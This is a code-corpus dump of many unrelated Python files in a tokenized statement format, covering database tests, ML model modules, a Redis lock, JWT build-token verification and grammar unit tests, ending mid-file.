content
stringlengths
0
1.55M
<import_from_stmt>unittest.mock patch<import_from_stmt>detective.core get_db_type stripped_db_url<def_stmt>test_get_db_type <block_start><assert_stmt>get_db_type("mysql://localhost")<eq>"mysql"<assert_stmt>get_db_type("mysql+pymysql://localhost")<eq>"mysql"<block_end><def_stmt>test_stripped_db_url <block_start><assert_stmt>stripped_db_url("mysql://localhost")<eq>"mysql://localhost"<assert_stmt>stripped_db_url("mysql://paulus@localhost")<eq>"mysql://paulus@localhost"<assert_stmt>(stripped_db_url("mysql://paulus:password@localhost")<eq>"mysql://paulus:***@localhost")<block_end><def_stmt>test_fetch_entities mock_db<block_start><with_stmt>patch.object(mock_db "perform_query" return_value=[["light.kitchen"] ["light.living_room"] ["switch.ac"] ] )<block_start>mock_db.fetch_entities()<block_end><assert_stmt>mock_db.entities<eq>["light.kitchen" "light.living_room" "switch.ac"]<block_end>
<import_stmt>torch<import_stmt>numpy<as>np<import_from_stmt>torchvision transforms<as>T<import_from_stmt>sklearn.preprocessing normalize<import_stmt>os<def_stmt>load_image npy_path input_shape=(630 80)<block_start>data=np.load(npy_path)<if_stmt>data.shape[0]<ge>input_shape[0]<block_start>result=data[:input_shape[0] :]<block_end><else_stmt><block_start>result=np.zeros(input_shape)<line_sep>result[:data.shape[0] :data.shape[1]]=data<block_end>image=torch.from_numpy(result).unsqueeze(0).unsqueeze(0)<line_sep><return>image.float()<block_end><def_stmt>get_feature model image<block_start>data=image.to(torch.device("cuda"))<with_stmt>torch.no_grad()<block_start>output=model(data)<block_end>output=output.cpu().detach().numpy()<line_sep>output=normalize(output).flatten()<line_sep><return>np.matrix(output)<block_end><def_stmt>writeFile fileName content<block_start><with_stmt>open(fileName 'a')<as>f1<block_start>f1.write(content+os.linesep)<block_end><block_end>
<import_stmt>pendulum<import_stmt>requests<import_from_stmt>.config MY_SHANBAY_USER_NAME SHANBAY_CALENDAR_API<def_stmt>_get_shanbay_streak end_date=pendulum.now("Asia/Shanghai") streak=0<block_start>start_date=end_date.start_of("month")<line_sep>r=requests.get(SHANBAY_CALENDAR_API.format(user_name=MY_SHANBAY_USER_NAME start_date=start_date.to_date_string() end_date=end_date.to_date_string() ))<if_stmt><not>r.ok<block_start><raise>Exception("Can not get days from shanbay API")<block_end>data=r.json()<line_sep>logs=data["logs"]<if_stmt><not>logs<block_start><return>streak<block_end>periods=list(pendulum.period(start_date end_date.subtract(days=1)))<line_sep>periods.sort(reverse=<true>)<line_sep>log_dates=[i["date"]<for>i logs]<line_sep># if today id done <if_stmt>end_date.to_date_string()<in>log_dates<block_start>streak<augadd>1<block_end># for else if not break not else <for_stmt>p periods<block_start><if_stmt>p.to_date_string()<not><in>log_dates<block_start><break><block_end>streak<augadd>1<block_end><else_stmt><block_start>streak=_get_shanbay_streak(start_date.subtract(months=1).end_of("month") streak=streak)<block_end><return>streak<block_end><def_stmt>get_shanbay_daily *args<block_start>""" first get today status """<line_sep>end_date=pendulum.now("Asia/Shanghai")<line_sep>start_date=end_date.start_of("month")<line_sep>r=requests.get(SHANBAY_CALENDAR_API.format(user_name=MY_SHANBAY_USER_NAME start_date=start_date.to_date_string() end_date=end_date.to_date_string() ))<if_stmt><not>r.ok<block_start><raise>Exception("Can not get days from shanbay API")<block_end>data=r.json()<line_sep>is_today_check=<false><line_sep>total_days=data.get("checkin_days_num" 0)<line_sep>log_dates=[i["date"]<for>i data["logs"]]<if_stmt>end_date.to_date_string()<in>log_dates<block_start>is_today_check=<true><block_end>streak=_get_shanbay_streak()<line_sep><return>total_days streak is_today_check<block_end>
<import_stmt>numpy<def_stmt>permute_node node permutation_index axis=-1<block_start>"""Permute index of `node` array Args: node (numpy.ndarray): the array whose `axis` to be permuted. permutation_index (numpy.ndarray): 1d numpy array whose size should be same as permutation axis of `node`. axis (int): permutation axis. Returns (numpy.ndarray): permutated `node` array. """<if_stmt>node.shape[axis]<ne>len(permutation_index)<block_start><raise>ValueError('node.shape[{}] = {} and len(permutation_index) = {} do not match!'.format(axis node.shape[axis] len(permutation_index)))<block_end>out_node=numpy.take(node permutation_index axis=axis).copy()<line_sep><return>out_node<block_end><def_stmt>permute_adj adj permutation_index axis=<none><block_start>"""Permute index of adjacency matrix array Args: adj (numpy.ndarray): the array whose `axis` to be permuted. It is considered as adjacency matrix. permutation_index (numpy.ndarray): 1d numpy array whose size should be same as permutation axis of `node`. axis (list or tuple or None): list of 2d int, indicates the permutation axis. When None is passed (default), it uses -1 and -2 as `axis`, it means that last 2 axis are considered to be permuted. Returns (numpy.ndarray): permutated `adj` array. """<if_stmt>axis<is><not><none><block_start><if_stmt><not>isinstance(axis (list tuple))<block_start><raise>TypeError('axis must be list or tuple, got {}'.format(type(axis)))<block_end><if_stmt>len(axis)<ne>2<block_start><raise>ValueError('axis length must 2, got {}'.format(len(axis)))<block_end><block_end><else_stmt><block_start>axis=[-1 -2]<block_end># default value is to use last 2 axis num_node=len(permutation_index)<for_stmt>ax axis<block_start><if_stmt>adj.shape[ax]<ne>len(permutation_index)<block_start><raise>ValueError('adj.shape[{}] = {} and len(permutation_index) = {} do not '<concat>'match!'.format(axis adj.shape[axis] len(permutation_index)))<block_end><block_end>out_adj=numpy.zeros_like(adj)<line_sep>ndim=adj.ndim<for_stmt>i range(num_node)<block_start><for_stmt>j range(num_node)<block_start>in_indices=[slice(<none>)]<times>ndim<line_sep>out_indices=[slice(<none>)]<times>ndim<line_sep>in_indices[axis[0]]=i<line_sep>in_indices[axis[1]]=j<line_sep>out_indices[axis[0]]=permutation_index[i]<line_sep>out_indices[axis[1]]=permutation_index[j]<line_sep>out_adj[tuple(in_indices)]=adj[tuple(out_indices)]<block_end><block_end><return>out_adj<block_end>
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """<import_stmt>time<import_from_stmt>contextlib contextmanager<import_from_stmt>uuid uuid4<import_from_stmt>django.conf settings<import_from_stmt>redis.exceptions LockError<line_sep>MAX_RETRY=getattr(settings "REDIS_LOCK_MAX_RETRY" <none>)<or>500<line_sep>@contextmanager<def_stmt>redis_lock redis_instance key<block_start>lock_key="lock_{}".format(key)<line_sep>lock_id=str(uuid4())<try_stmt><block_start>lock_acquired=acquire_redis_lock(redis_instance lock_key lock_id)<line_sep>err=(<none><if>lock_acquired<else>LockError(f"Unable to acquire redis lock in max tries, lock key: {lock_key}, lock_id: {lock_id}"))<line_sep><yield>lock_acquired err<block_end><finally_stmt><block_start>release_redis_lock(redis_instance lock_key lock_id)<block_end><block_end><def_stmt>acquire_redis_lock redis_instance lock_key lock_id<block_start>cnt=1<while_stmt>cnt<l>MAX_RETRY<block_start><if_stmt>redis_instance.set(lock_key lock_id ex=5 nx=<true>)<block_start><return><true><block_end>cnt<augadd>1<line_sep>time.sleep(0.01)<block_end><return><false><block_end><def_stmt>release_redis_lock redis_instance lock_key lock_id<block_start>lock_value=redis_instance.get(lock_key)<line_sep># 兼容不同模式的redis lock_value=lock_value.decode()<if>isinstance(lock_value bytes)<else>lock_value<if_stmt>lock_value<eq>lock_id<block_start>redis_instance.delete(lock_key)<block_end><block_end>
<def_stmt>first_method <block_start>"""First sibling package method."""<line_sep><return>1<block_end><def_stmt>second_method <block_start>"""Second sibling package method."""<line_sep><return>2<block_end>
<import_stmt>sys<import_from_stmt>numba.testing run_tests<line_sep>sys.exit(0<if>run_tests(sys.argv).wasSuccessful()<else>1)<line_sep>
# Generated by Django 3.0.3 on 2020-03-01 19:25 <import_from_stmt>django.db migrations<import_stmt>i18nfield.fields<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[("submission" "0044_submission_anonymised_data") ]<line_sep>operations=[migrations.AlterField(model_name="question" name="help_text" field=i18nfield.fields.I18nCharField(blank=<true> max_length=800 null=<true>) ) ]<block_end>
<class_stmt>Defaults(object)<block_start>window_size=7<line_sep>hidden_sizes=[300]<line_sep>hidden_activation='relu'<line_sep>max_vocab_size=1000000<line_sep>optimizer='sgd'# 'adam' learning_rate=0.1# 1e-4 epochs=20<line_sep>iobes=<true># Map tags to IOBES on input max_tokens=<none># Max dataset size in tokens encoding='utf-8'# Data encoding output_drop_prob=0.0# Dropout probablility prior to output token_level_eval=<false># Force token-level evaluation verbosity=1# 0=quiet, 1=progress bar, 2=one line per epoch fixed_wordvecs=<false># Don't fine-tune word vectors word_features=<true><line_sep>batch_size=50<line_sep>viterbi=<true><line_sep># Learning rate multiplier for embeddings. This is a tweak to # implement faster learning for embeddings compared to other # layers. As the feature is not yet implemented in Keras master # (see https://github.com/fchollet/keras/pull/1991), this option # currently requires the fork https://github.com/spyysalo/keras . embedding_lr_multiplier=1.0<block_end>
#coding:utf8 ''' Created on 2013-8-12 @author: lan (www.9miao.com) '''<import_stmt>urllib sys<def_stmt>execute *args<block_start>""" """<if_stmt><not>args<block_start>masterport=9998<block_end><else_stmt><block_start>masterport=int(args[0])<block_end>url="http://localhost:%s/reloadmodule"%masterport<try_stmt><block_start>response=urllib.urlopen(url)<block_end><except_stmt><block_start>response=<none><block_end><if_stmt>response<block_start>sys.stdout.write("reload module success \n")<block_end><else_stmt><block_start>sys.stdout.write("reload module failed \n")<block_end><block_end>
# Copyright 2021 AlQuraishi Laboratory # Copyright 2021 DeepMind Technologies Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_stmt>functools partial<import_stmt>math<import_from_stmt>typing Optional List<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>fastfold.model.nn.primitives Linear LayerNorm Attention<import_from_stmt>fastfold.model.nn.dropout DropoutRowwise DropoutColumnwise <import_from_stmt>fastfold.model.nn.pair_transition PairTransition<import_from_stmt>fastfold.model.nn.triangular_attention TriangleAttentionStartingNode TriangleAttentionEndingNode <import_from_stmt>fastfold.model.nn.triangular_multiplicative_update TriangleMultiplicationOutgoing TriangleMultiplicationIncoming <import_from_stmt>fastfold.utils.checkpointing checkpoint_blocks<import_from_stmt>fastfold.utils.tensor_utils chunk_layer permute_final_dims flatten_final_dims <class_stmt>TemplatePointwiseAttention(nn.Module)<block_start>""" Implements Algorithm 17. """<def_stmt>__init__ self c_t c_z c_hidden no_heads inf **kwargs<block_start>""" Args: c_t: Template embedding channel dimension c_z: Pair embedding channel dimension c_hidden: Hidden channel dimension """<line_sep>super(TemplatePointwiseAttention self).__init__()<line_sep>self.c_t=c_t<line_sep>self.c_z=c_z<line_sep>self.c_hidden=c_hidden<line_sep>self.no_heads=no_heads<line_sep>self.inf=inf<line_sep>self.mha=Attention(self.c_z self.c_t self.c_t self.c_hidden self.no_heads gating=<false> )<block_end><def_stmt>_chunk self z:torch.Tensor t:torch.Tensor biases:List[torch.Tensor] chunk_size:int <arrow>torch.Tensor<block_start>mha_inputs={"q_x":z "kv_x":t "biases":biases }<line_sep><return>chunk_layer(self.mha mha_inputs chunk_size=chunk_size no_batch_dims=len(z.shape[:-2]) )<block_end><def_stmt>forward self t:torch.Tensor z:torch.Tensor template_mask:Optional[torch.Tensor]=<none> chunk_size:Optional[int]=<none><arrow>torch.Tensor<block_start>""" Args: t: [*, N_templ, N_res, N_res, C_t] template embedding z: [*, N_res, N_res, C_t] pair embedding template_mask: [*, N_templ] template mask Returns: [*, N_res, N_res, C_z] pair embedding update """<if_stmt>template_mask<is><none><block_start>template_mask=t.new_ones(t.shape[:-3])<block_end>bias=self.inf<times>(template_mask[<ellipsis> <none> <none> <none> <none> :]-1)<line_sep># [*, N_res, N_res, 1, C_z] z=z.unsqueeze(-2)<line_sep># [*, N_res, N_res, N_temp, C_t] t=permute_final_dims(t (1 2 0 3))<line_sep># [*, N_res, N_res, 1, C_z] biases=[bias]<if_stmt>chunk_size<is><not><none><block_start>z=self._chunk(z t biases chunk_size)<block_end><else_stmt><block_start>z=self.mha(q_x=z kv_x=t biases=biases)<block_end># [*, N_res, N_res, C_z] z=z.squeeze(-2)<line_sep><return>z<block_end><block_end><class_stmt>TemplatePairStackBlock(nn.Module)<block_start><def_stmt>__init__ self c_t:int c_hidden_tri_att:int c_hidden_tri_mul:int no_heads:int pair_transition_n:int dropout_rate:float inf:float **kwargs <block_start>super(TemplatePairStackBlock self).__init__()<line_sep>self.c_t=c_t<line_sep>self.c_hidden_tri_att=c_hidden_tri_att<line_sep>self.c_hidden_tri_mul=c_hidden_tri_mul<line_sep>self.no_heads=no_heads<line_sep>self.pair_transition_n=pair_transition_n<line_sep>self.dropout_rate=dropout_rate<line_sep>self.inf=inf<line_sep>self.dropout_row=DropoutRowwise(self.dropout_rate)<line_sep>self.dropout_col=DropoutColumnwise(self.dropout_rate)<line_sep>self.tri_att_start=TriangleAttentionStartingNode(self.c_t self.c_hidden_tri_att self.no_heads inf=inf )<line_sep>self.tri_att_end=TriangleAttentionEndingNode(self.c_t self.c_hidden_tri_att self.no_heads inf=inf )<line_sep>self.tri_mul_out=TriangleMultiplicationOutgoing(self.c_t self.c_hidden_tri_mul )<line_sep>self.tri_mul_in=TriangleMultiplicationIncoming(self.c_t self.c_hidden_tri_mul )<line_sep>self.pair_transition=PairTransition(self.c_t self.pair_transition_n )<block_end><def_stmt>forward self z:torch.Tensor mask:torch.Tensor chunk_size:Optional[int]=<none> _mask_trans:bool=<true><block_start>single_templates=[t.unsqueeze(-4)<for>t torch.unbind(z dim=-4)]<line_sep>single_templates_masks=[m.unsqueeze(-3)<for>m torch.unbind(mask dim=-3)]<for_stmt>i range(len(single_templates))<block_start>single=single_templates[i]<line_sep>single_mask=single_templates_masks[i]<line_sep>single=single+self.dropout_row(self.tri_att_start(single chunk_size=chunk_size mask=single_mask))<line_sep>single=single+self.dropout_col(self.tri_att_end(single chunk_size=chunk_size mask=single_mask))<line_sep>single=single+self.dropout_row(self.tri_mul_out(single mask=single_mask))<line_sep>single=single+self.dropout_row(self.tri_mul_in(single mask=single_mask))<line_sep>single=single+self.pair_transition(single mask=single_mask<if>_mask_trans<else><none> chunk_size=chunk_size )<line_sep>single_templates[i]=single<block_end>z=torch.cat(single_templates dim=-4)<line_sep><return>z<block_end><block_end><class_stmt>TemplatePairStack(nn.Module)<block_start>""" Implements Algorithm 16. """<def_stmt>__init__ self c_t c_hidden_tri_att c_hidden_tri_mul no_blocks no_heads pair_transition_n dropout_rate blocks_per_ckpt inf=1e9 **kwargs <block_start>""" Args: c_t: Template embedding channel dimension c_hidden_tri_att: Per-head hidden dimension for triangular attention c_hidden_tri_att: Hidden dimension for triangular multiplication no_blocks: Number of blocks in the stack pair_transition_n: Scale of pair transition (Alg. 15) hidden dimension dropout_rate: Dropout rate used throughout the stack blocks_per_ckpt: Number of blocks per activation checkpoint. None disables activation checkpointing """<line_sep>super(TemplatePairStack self).__init__()<line_sep>self.blocks_per_ckpt=blocks_per_ckpt<line_sep>self.blocks=nn.ModuleList()<for_stmt>_ range(no_blocks)<block_start>block=TemplatePairStackBlock(c_t=c_t c_hidden_tri_att=c_hidden_tri_att c_hidden_tri_mul=c_hidden_tri_mul no_heads=no_heads pair_transition_n=pair_transition_n dropout_rate=dropout_rate inf=inf )<line_sep>self.blocks.append(block)<block_end>self.layer_norm=LayerNorm(c_t)<block_end><def_stmt>forward self t:torch.tensor mask:torch.tensor chunk_size:int _mask_trans:bool=<true> <block_start>""" Args: t: [*, N_templ, N_res, N_res, C_t] template embedding mask: [*, N_templ, N_res, N_res] mask Returns: [*, N_templ, N_res, N_res, C_t] template embedding update """<if_stmt>(mask.shape[-3]<eq>1)<block_start>expand_idx=list(mask.shape)<line_sep>expand_idx[-3]=t.shape[-4]<line_sep>mask=mask.expand(*expand_idx)<block_end>t,=checkpoint_blocks(blocks=[partial(b mask=mask chunk_size=chunk_size _mask_trans=_mask_trans )<for>b self.blocks] args=(t ) blocks_per_ckpt=self.blocks_per_ckpt<if>self.training<else><none> )<line_sep>t=self.layer_norm(t)<line_sep><return>t<block_end><block_end>
<import_stmt>jsonschema<import_stmt>jwt<import_stmt>logging<import_from_stmt>app instance_keys<import_from_stmt>util.security jwtutil<import_from_stmt>util.security.registry_jwt generate_bearer_token InvalidBearerTokenException ALGORITHM JWT_CLOCK_SKEW_SECONDS <line_sep>logger=logging.getLogger(__name__)<line_sep>ANONYMOUS_SUB="(anonymous)"<line_sep>BUILD_JOB_REGISTRATION_TYPE="build_job_registration"<line_sep>BUILD_JOB_TOKEN_TYPE="build_job_token"<line_sep>BUILD_TOKEN_CONTEXT_SCHEMA={"type":"object" "description":"Build context" "required":["token_type" "build_id" "job_id" "expiration"] "properties":{"token_type":{"type":"string" "description":"The build token type" } "build_id":{"type":"string" "description":"The build id" } "job_id":{"type":"string" "description":"The job id" } "expiration":{"type":"number" "description":"The number of seconds until the job expires" } } }<class_stmt>InvalidBuildTokenException(Exception)<block_start><pass><block_end><def_stmt>build_token aud token_type build_id job_id expiration instance_keys<block_start>"""Returns an encoded JWT for the given build, signed by the local instance's private."""<line_sep>token_data={"token_type":token_type "build_id":build_id "job_id":job_id "expiration":expiration }<line_sep>token=generate_bearer_token(aud ANONYMOUS_SUB token_data {} expiration instance_keys)<line_sep><return>token.decode("utf-8")<block_end><def_stmt>verify_build_token token aud token_type instance_keys<block_start>"""Verify the JWT build token."""<try_stmt><block_start>headers=jwt.get_unverified_header(token)<block_end><except_stmt>jwtutil.InvalidTokenError<as>ite<block_start>logger.error("Invalid token reason: %s" ite)<line_sep><raise>InvalidBuildTokenException(ite)<block_end>kid=headers.get("kid" <none>)<if_stmt>kid<is><none><block_start>logger.error("Missing kid header on encoded JWT: %s" token)<line_sep><raise>InvalidBuildTokenException("Missing kid header")<block_end>public_key=instance_keys.get_service_key_public_key(kid)<if_stmt>public_key<is><none><block_start>logger.error("Could not find requested service key %s with encoded JWT: %s" kid token)<line_sep><raise>InvalidBuildTokenException("Unknown service key")<block_end><try_stmt><block_start>payload=jwtutil.decode(token public_key verify=<true> algorithms=[ALGORITHM] audience=aud issuer=instance_keys.service_name leeway=JWT_CLOCK_SKEW_SECONDS )<block_end><except_stmt>jwtutil.InvalidTokenError<as>ite<block_start>logger.error("Invalid token reason: %s" ite)<line_sep><raise>InvalidBuildTokenException(ite)<block_end><if_stmt>"sub"<not><in>payload<block_start><raise>InvalidBuildTokenException("Missing sub field in JWT")<block_end><if_stmt>payload["sub"]<ne>ANONYMOUS_SUB<block_start><raise>InvalidBuildTokenException("Wrong sub field in JWT")<block_end><if_stmt>("context"<not><in>payload<or><not>payload["context"]["token_type"]<or><not>payload["context"]["build_id"]<or><not>payload["context"]["job_id"]<or><not>payload["context"]["expiration"])<block_start><raise>InvalidBuildTokenException("Missing context field in JWT")<block_end><try_stmt><block_start>jsonschema.validate(payload["context"] BUILD_TOKEN_CONTEXT_SCHEMA)<block_end><except_stmt>jsonschema.ValidationError<block_start><raise>InvalidBuildTokenException("Unable to validate build token context schema: malformed context")<block_end><if_stmt>payload["context"]["token_type"]<ne>token_type<block_start><raise>InvalidBuildTokenException("Build token type in JWT does not match expected type: %s"%token_type)<block_end><return>payload<block_end>
""" Wine Classification Dataset Visualization ========================================== """<line_sep># sphinx_gallery_thumbnail_number = 4 <import_stmt>matplotlib.pyplot<as>plt<import_from_stmt>sklearn.datasets load_wine<import_from_stmt>dabl plot<import_from_stmt>dabl.utils data_df_from_bunch<line_sep>wine_bunch=load_wine()<line_sep>wine_df=data_df_from_bunch(wine_bunch)<line_sep>plot(wine_df 'target')<line_sep>plt.show()<line_sep>
"""CloudWatch Embedded Metric Format utility """<import_from_stmt>.base MetricUnit<import_from_stmt>.exceptions MetricUnitError MetricValueError SchemaValidationError<import_from_stmt>.metric single_metric<import_from_stmt>.metrics Metrics<line_sep>__all__=["Metrics" "single_metric" "MetricUnit" "MetricUnitError" "SchemaValidationError" "MetricValueError" ]<line_sep>
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for arithmetic_grammar."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>absl.testing parameterized<import_stmt>numpy<as>np<import_from_stmt>six.moves map<import_stmt>tensorflow.compat.v1<as>tf<import_from_stmt>neural_guided_symbolic_regression.utils arithmetic_grammar<class_stmt>ReadGrammarFromFileTest(tf.test.TestCase)<block_start><def_stmt>setUp self<block_start>super(ReadGrammarFromFileTest self).setUp()<line_sep># NLTK grammar use double quotes for production rules. # pylint: disable=g-inconsistent-quotes self.expected_set=set(["S -> S '+' T" "S -> S '-' T" "S -> S '*' T" "S -> S '/' T" "S -> T" "T -> '(' S ')'" "T -> 'x'" "T -> '1'" ])<line_sep># pylint: enable=g-inconsistent-quotes <block_end><def_stmt>test_read_grammar_return_grammar self<block_start>grammar=arithmetic_grammar.read_grammar_from_file('third_party/google_research/google_research/'<concat>'neural_guided_symbolic_regression/grammar/'<concat>'univariate_one_constant_grammar.txt' return_list=<false>)<line_sep>production_rules_set=set(map(str grammar.productions()))<line_sep>self.assertEqual(production_rules_set self.expected_set)<block_end><def_stmt>test_read_grammar_return_list self<block_start>grammar=arithmetic_grammar.read_grammar_from_file('third_party/google_research/google_research/'<concat>'neural_guided_symbolic_regression/grammar/'<concat>'univariate_one_constant_grammar.txt' return_list=<true>)<line_sep>production_rules_set=set(map(str grammar))<line_sep>self.assertEqual(production_rules_set self.expected_set)<block_end><block_end><class_stmt>ArithmeticGrammarTest(parameterized.TestCase tf.test.TestCase)<block_start><def_stmt>test_input_grammar_rules_not_list self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'The input grammar_rules should be list.')<block_start>arithmetic_grammar.Grammar('foo')<block_end><block_end><def_stmt>test_input_grammar_rules_not_unique self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'The grammar production rules are not unique.')<block_start>arithmetic_grammar.Grammar(['foo' 'foo'])<block_end><block_end><def_stmt>test_input_grammar_rules_contain_padding_dummy_production_rule self# If dummy production rule exists in the input grammar rules, it will be # duplicated with the dummy production rule appended in the # arithmetic_grammar. <block_start><with_stmt>self.assertRaisesRegex(ValueError 'The grammar production rules are not unique.')<block_start>arithmetic_grammar.Grammar(['foo' 'Nothing -> None'])<block_end><block_end><def_stmt>test_input_grammar_rules_not_change self<block_start>grammar_rules=['S -> T' 'T -> "x"']<line_sep>arithmetic_grammar.Grammar(grammar_rules)<line_sep>self.assertListEqual(grammar_rules ['S -> T' 'T -> "x"'])<block_end><def_stmt>test_basic_production_rules self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<line_sep>self.assertLen(grammar.prod_rules 5)<line_sep>self.assertEqual(grammar.num_production_rules 5)<line_sep>self.assertEqual(grammar.padding_rule_index 4)<line_sep>self.assertEqual(grammar.start_index.symbol() 'S')<line_sep>self.assertEqual(str(grammar.start_rule) "S -> S '+' T")<line_sep>self.assertEqual(grammar.unique_lhs ['Nothing' 'S' 'T'])<line_sep>self.assertEqual(grammar.num_unique_lhs 3)<line_sep>np.testing.assert_allclose(grammar.masks [[0. 0. 0. 0. 1.] [1. 1. 0. 0. 0.] [0. 0. 1. 1. 0.]])<line_sep>np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index [1 1 2 2 0])<line_sep>self.assertEqual(grammar.prod_rule_rhs_indices [[1 2] [2] [1] [] []])<line_sep>self.assertEqual(grammar.max_rhs_indices_size 2)<block_end><def_stmt>test_basic_production_rules_add_unique_production_rule_to_start self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules add_unique_production_rule_to_start=<true>)<line_sep>self.assertLen(grammar.prod_rules 6)<line_sep>self.assertEqual(grammar.num_production_rules 6)<line_sep>self.assertEqual(grammar.padding_rule_index 5)<line_sep>self.assertEqual(grammar.start_index.symbol() 'O')<line_sep>self.assertEqual(str(grammar.start_rule) 'O -> S')<line_sep>self.assertEqual(grammar.unique_lhs ['Nothing' 'O' 'S' 'T'])<line_sep>self.assertEqual(grammar.num_unique_lhs 4)<line_sep>np.testing.assert_allclose(grammar.masks [[0. 0. 0. 0. 0. 1.] [1. 0. 0. 0. 0. 0.] [0. 1. 1. 0. 0. 0.] [0. 0. 0. 1. 1. 0.]])<line_sep>np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index [1 2 2 3 3 0])<line_sep>self.assertEqual(grammar.prod_rule_rhs_indices [[2] [2 3] [3] [2] [] []])<line_sep>self.assertEqual(grammar.max_rhs_indices_size 2)<block_end><def_stmt>test_basic_production_rules_padding_at_end_false self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=<false>)<line_sep>self.assertLen(grammar.prod_rules 5)<line_sep>self.assertEqual(grammar.num_production_rules 5)<line_sep>self.assertEqual(grammar.padding_rule_index 0)<line_sep>self.assertEqual(grammar.start_index.symbol() 'S')<line_sep>self.assertEqual(str(grammar.start_rule) "S -> S '+' T")<line_sep>self.assertEqual(grammar.unique_lhs ['Nothing' 'S' 'T'])<line_sep>self.assertEqual(grammar.num_unique_lhs 3)<line_sep>np.testing.assert_allclose(grammar.masks [[1. 0. 0. 0. 0.] [0. 1. 1. 0. 0.] [0. 0. 0. 1. 1.]])<line_sep>np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index [0 1 1 2 2])<line_sep>self.assertEqual(grammar.prod_rule_rhs_indices [[] [1 2] [2] [1] []])<line_sep>self.assertEqual(grammar.max_rhs_indices_size 2)<block_end>@parameterized.parameters([(<true> <true> "\t0: S -> T\n\t1: T -> 'x'\n\t2: Nothing -> None\n") (<true> <false> "0: S -> T\n1: T -> 'x'\n2: Nothing -> None\n") (<false> <true> "\t0: Nothing -> None\n\t1: S -> T\n\t2: T -> 'x'\n") (<false> <false> "0: Nothing -> None\n1: S -> T\n2: T -> 'x'\n") ])<def_stmt>test_grammar_to_string self padding_at_end indent expected_string<block_start>grammar_rules=['S -> T' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules padding_at_end=padding_at_end)<line_sep>self.assertEqual(grammar.grammar_to_string(indent=indent) expected_string)<block_end><def_stmt>test_invalid_grammar_string_no_space_before_arrow self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'Unable to parse')# No space between arrow and left hand side symbol. <block_start>arithmetic_grammar.Grammar(['a-> b'])<block_end><block_end><def_stmt>test_invalid_grammar_string_no_space_after_arrow self# No space between arrow and right hand side symbol. # This is a valid input and should not raise error. <block_start>arithmetic_grammar.Grammar(['a ->b'])<block_end><def_stmt>test_invalid_grammar_string_no_arrow self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'Unable to parse')# Invalid input with no arrow. <block_start>arithmetic_grammar.Grammar(['a b'])<block_end><block_end><def_stmt>test_invalid_grammar_string_two_left_hand_side_symbols self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'Unable to parse')# Invalid input with more than one left hand side symbol. <block_start>arithmetic_grammar.Grammar(['a b -> c'])<block_end><block_end><def_stmt>test_invalid_grammar_string_no_left_hand_side_symbol self<block_start><with_stmt>self.assertRaisesRegex(ValueError 'Unable to parse')# Invalid input with no left hand side symbol. <block_start>arithmetic_grammar.Grammar([' -> c'])<block_end><block_end><def_stmt>test_invalid_grammar_string_empty_right_hand_side_symbol self# No right hand side symbol. # This is a valid input and should not raise error. <block_start>arithmetic_grammar.Grammar(['a -> '])<block_end><def_stmt>test_parse_expressions_to_indices_sequences_input_not_list self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<with_stmt>self.assertRaisesRegex(ValueError 'expression_strings is expected to be list, but got')<block_start>grammar.parse_expressions_to_indices_sequences(# Note the input expression_strings is a string not a list of strings. expression_strings='x + ( x )' max_length=8)<block_end><block_end><def_stmt>test_parse_expressions_to_indices_sequences_short_max_length self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<with_stmt>self.assertRaisesRegex(ValueError r'The number of production rules to parse expression .* '<concat>'can not be greater than max_length')<block_start>grammar.parse_expressions_to_indices_sequences(expression_strings=['x + ( x )'] max_length=2)<block_end><block_end><def_stmt>test_parse_expressions_to_indices_sequences_invalid_expression_string self<block_start>grammar_rules=['S -> S "+" T' 'S -> T' 'T -> "(" S ")"' 'T -> "x"' ]<line_sep>grammar=arithmetic_grammar.Grammar(grammar_rules)<with_stmt>self.assertRaisesRegex(ValueError 'cannot be parsed to production 